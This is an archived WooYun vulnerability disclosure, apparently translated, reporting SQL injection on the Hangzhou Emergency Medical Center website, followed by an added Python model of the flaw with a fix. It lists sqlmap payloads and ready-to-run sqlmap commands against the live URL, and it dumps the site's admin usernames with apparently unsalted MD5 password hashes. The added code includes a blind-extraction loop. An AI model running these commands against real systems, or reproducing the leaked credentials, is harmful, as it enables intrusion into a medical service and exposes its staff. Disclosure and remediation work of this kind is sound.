WooYun (WooYun.org) historical vulnerability archive: http://wy.zone.ci/
WooYun Drops articles, online reader: http://drop.zone.ci/
2014-05-19: Details sent to the vendor; awaiting the vendor's response
2014-05-23: Vendor confirmed the issue; details disclosed to the vendor only
2014-06-02: Details disclosed to core white hats and domain experts
2014-06-12: Details disclosed to regular white hats
2014-06-22: Details disclosed to intern white hats
2014-07-03: Details disclosed to the public
How I took the #Hangzhou Emergency Medical Center (Zhejiang) database# in "four steps": large-scale leak of sensitive information
A MySQL injection vulnerability leads to a full database leak. Injection point:
http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78
sqlmap identified both GET parameters as injectable:

---
Place: GET
Parameter: classid
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: classid=52 AND (SELECT 9444 FROM(SELECT COUNT(*),CONCAT(0x3a7170643a,(SELECT (CASE WHEN (9444=9444) THEN 1 ELSE 0 END)),0x3a6677633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&id=78

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 column
    Payload: classid=52 LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a7170643a,0x70415046774c696d6662,0x3a6677633a)#&id=78

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=52 AND SLEEP(5)&id=78

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: classid=52&id=78 AND 3941=3941

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: classid=52&id=78 AND (SELECT 3525 FROM(SELECT COUNT(*),CONCAT(0x3a7170643a,(SELECT (CASE WHEN (3525=3525) THEN 1 ELSE 0 END)),0x3a6677633a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: classid=52&id=78 AND SLEEP(5)
---
#1. Enumerate the databases:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" --dbs
available databases [2]:
[*] hangzhou120
[*] information_schema
#2. Enumerate the tables:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 --tables
Database: hangzhou120
[41 tables]
+--------------------+
| hxcms_about        |
| hxcms_addlist      |
| hxcms_address      |
| hxcms_admin        |
| hxcms_adv          |
| hxcms_allsky       |
| hxcms_announce     |
| hxcms_batch        |
| hxcms_bodys        |
| hxcms_bodytest     |
| hxcms_booking      |
| hxcms_buy          |
| hxcms_buycar_model |
| hxcms_canquery     |
| hxcms_channel      |
| hxcms_class        |
| hxcms_classfiy     |
| hxcms_coll         |
| hxcms_comments     |
| hxcms_config       |
| hxcms_contact      |
| hxcms_dkbuy        |
| hxcms_famous       |
| hxcms_field        |
| hxcms_food         |
| hxcms_honors       |
| hxcms_job          |
| hxcms_joinline     |
| hxcms_member       |
| hxcms_memup        |
| hxcms_network      |
| hxcms_news         |
| hxcms_order        |
| hxcms_orderlist    |
| hxcms_orders       |
| hxcms_product      |
| hxcms_questions    |
| hxcms_resume       |
| hxcms_select       |
| hxcms_travel       |
| hxcms_weblink      |
+--------------------+
#3. Enumerate the columns of the admin table:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 -T hxcms_admin --columns
Table: hxcms_admin
[8 columns]
+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| adminclass    | varchar(255)  |
| adminConfig   | varchar(255)  |
| adminDate     | datetime      |
| adminlock     | varbinary(20) |
| adminlov      | int(11)       |
| adminName     | varchar(255)  |
| adminPassWord | varchar(255)  |
| ID            | int(11)       |
+---------------+---------------+
#4. Dump the contents:
./sqlmap.py -u "http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78" -D hangzhou120 -T hxcms_admin -C adminName,adminPassWord --dump
Table: hxcms_admin
[8 entries]
+-----------+----------------------------------+
| adminName | adminPassWord                    |
+-----------+----------------------------------+
| admin     | 51d326e56c9a5a96a0b2ce4b7d7e5398 |
| login     | 9af50b9300892719dd86a168d42858be |
| medical   | 730d428bba8a70414e5f9bd6c76b0db1 |
| office    | dbd1d9adacb60ba31bb49aec76fe00a9 |
| party     | 1d54533d9d94c4557733131e0b4f32c7 |
| train     | cc046ff85e8c55d48e739a630bb3a5a8 |
| union     | 2a9f0855cc76fbd65a9f5b1c39266b57 |
| wang      | 85f7a43e6008e40d5f5a27340fdb4a6b |
+-----------+----------------------------------+
There is a lot more, but I won't show it all. - -.
:)
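The four sqlmap steps above are all driven by one defect: the `classid` and `id` values from the query string reach the SQL statement unchanged. The following is an added example, not code from the original report or from the hangzhou120 site, that models that defect stand-alone so it runs offline. Python's sqlite3 stands in for the site's MySQL backend, so the MySQL-only vectors from the sqlmap output (the FLOOR(RAND(0)*2) GROUP BY error-based payload and SLEEP()) are not modelled, and the UNION payload is adapted to SQLite (`||` for CONCAT, `-- ` for MySQL's `#`, `AND 1=0` in place of `LIMIT 1,1`); the boolean-based payload is used exactly as sqlmap listed it. The table names come from the sqlmap output; the `title` column, the row and the hash value are constructed. `blind_extract` shows what `--dump` does internally in boolean-based blind mode, pulling the admin hash one character at a time through the true/false oracle. The hardened query at the end is the fix a practitioner would want: type-check, then bind. A related caveat for the dump above: every adminPassWord value is 32 hex characters, the length of an unsalted MD5 digest, which is why a leak of this table is directly usable; hashing is not modelled here.

```python
"""Model of the injectable topic_detail.php?classid=..&id=.. query.

Added example, not the site's code. sqlite3 replaces MySQL; rows and the
hash are constructed sample data; table names follow the sqlmap output.
"""
import sqlite3

SAMPLE_HASH = "0123456789abcdef0123456789abcdef"  # constructed, not a dumped value


def make_db() -> sqlite3.Connection:
    """Build an in-memory stand-in for the hangzhou120 database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE hxcms_news (id INTEGER, classid INTEGER, title TEXT);"
        "CREATE TABLE hxcms_admin (adminName TEXT, adminPassWord TEXT);"
        "INSERT INTO hxcms_news VALUES (78, 52, 'Emergency notice');"
    )
    conn.execute("INSERT INTO hxcms_admin VALUES (?, ?)", ("admin", SAMPLE_HASH))
    return conn


def topic_detail_vulnerable(conn, classid: str, id_: str) -> list:
    """The pattern that makes the page injectable: raw GET values
    concatenated straight into the statement."""
    sql = f"SELECT title FROM hxcms_news WHERE classid={classid} AND id={id_}"
    return [row[0] for row in conn.execute(sql)]


def topic_detail_safe(conn, classid: str, id_: str) -> list:
    """Hardened form: reject non-integers, then bind with placeholders."""
    try:
        cid, tid = int(classid), int(id_)
    except ValueError:
        return []
    sql = "SELECT title FROM hxcms_news WHERE classid=? AND id=?"
    return [row[0] for row in conn.execute(sql, (cid, tid))]


# sqlmap's boolean-based payloads on `id`, exactly as listed on the page.
TRUE_PAYLOAD = "78 AND 3941=3941"
FALSE_PAYLOAD = "78 AND 3941=3942"

# UNION payload on `classid`, adapted to SQLite: `||` for CONCAT, `-- ` for `#`
# (it swallows the trailing " AND id=78"), `AND 1=0` to empty the first SELECT.
UNION_PAYLOAD = ("52 AND 1=0 UNION ALL SELECT adminName || ':' || adminPassWord "
                 "FROM hxcms_admin-- ")


def blind_extract(conn, pos_max: int = 64) -> str:
    """Recover hxcms_admin.adminPassWord through the boolean oracle, the way
    sqlmap's boolean-based blind mode does: for each position, binary-search
    the character code. SQLite's unicode()/substr() stand in for MySQL's
    ASCII()/SUBSTRING(); each oracle call is one HTTP request in practice."""
    def oracle(cond: str) -> bool:
        return len(topic_detail_vulnerable(conn, "52", f"78 AND ({cond})")) > 0

    target = "(SELECT adminPassWord FROM hxcms_admin LIMIT 1)"
    out = ""
    for pos in range(1, pos_max + 1):
        if not oracle(f"length({target})>={pos}"):
            break  # ran past the end of the value
        lo, hi = 32, 127  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr({target},{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    print("true  :", topic_detail_vulnerable(db, "52", TRUE_PAYLOAD))
    print("false :", topic_detail_vulnerable(db, "52", FALSE_PAYLOAD))
    print("union :", topic_detail_vulnerable(db, UNION_PAYLOAD, "78"))
    print("blind :", blind_extract(db))
    print("safe  :", topic_detail_safe(db, "52", TRUE_PAYLOAD))
```

Running it shows the true payload returning the article and the false one returning nothing (the oracle sqlmap used on `id`), the UNION payload returning `admin:<hash>` in the title column (one column, matching sqlmap's "UNION query (NULL) - 1 column"), the blind loop reconstructing the full hash, and the bound query returning nothing for every payload because `int()` rejects them before any SQL is built.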
Severity: High
Vulnerability Rank: 10
Confirmed: 2014-05-23 11:48
CNVD confirmed and reproduced the reported issue; it has been forwarded through CNCERT to the Zhejiang branch for handling.
None yet.